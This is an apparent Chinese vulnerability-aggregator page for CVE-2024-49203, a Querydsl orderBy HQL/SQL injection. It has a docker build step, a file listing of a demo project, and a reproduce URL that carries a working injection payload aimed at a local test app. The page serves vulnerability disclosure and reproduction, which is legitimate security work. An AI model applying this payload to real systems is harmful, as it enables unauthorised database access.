POC详情: cf15583991bae21812ca3d6a6f0dda8d26de5d8f

来源
关联漏洞
标题: Querydsl 安全漏洞 (CVE-2024-49203)
描述:Querydsl是Querydsl开源的一个框架,它支持为多个后端构建类型安全的类 SQL 查询。 Querydsl 5.1.0版本存在安全漏洞,该漏洞源于允许在JPAQuery中的orderBy中进行SQL或HQL注入。
介绍
Build
-----

```docker compose up -d```


Reproduce
---------
In browser go to 

```http://localhost:8000/products?orderBy=name+INTERSECT+SELECT+t+FROM+Test+t+WHERE+(SELECT+'2')='2'+ORDER+BY+t.id```
文件快照

[4.0K] /data/pocs/cf15583991bae21812ca3d6a6f0dda8d26de5d8f ├── [4.0K] demo │   ├── [ 429] Dockerfile │   ├── [ 10K] mvnw │   ├── [6.8K] mvnw.cmd │   ├── [2.2K] pom.xml │   └── [4.0K] src │   ├── [4.0K] main │   │   ├── [4.0K] java │   │   │   └── [4.0K] com │   │   │   └── [4.0K] example │   │   │   └── [4.0K] demo │   │   │   ├── [ 305] DemoApplication.java │   │   │   ├── [1.0K] QTest.java │   │   │   ├── [1.1K] TestController.java │   │   │   └── [ 651] Test.java │   │   └── [4.0K] resources │   │   └── [ 275] application.properties │   └── [4.0K] test │   └── [4.0K] java │   └── [4.0K] com │   └── [4.0K] example │   └── [4.0K] demo │   └── [ 206] DemoApplicationTests.java ├── [ 672] docker-compose.yml ├── [4.0K] postgres │   └── [ 111] init.sql └── [ 199] README.md 14 directories, 13 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。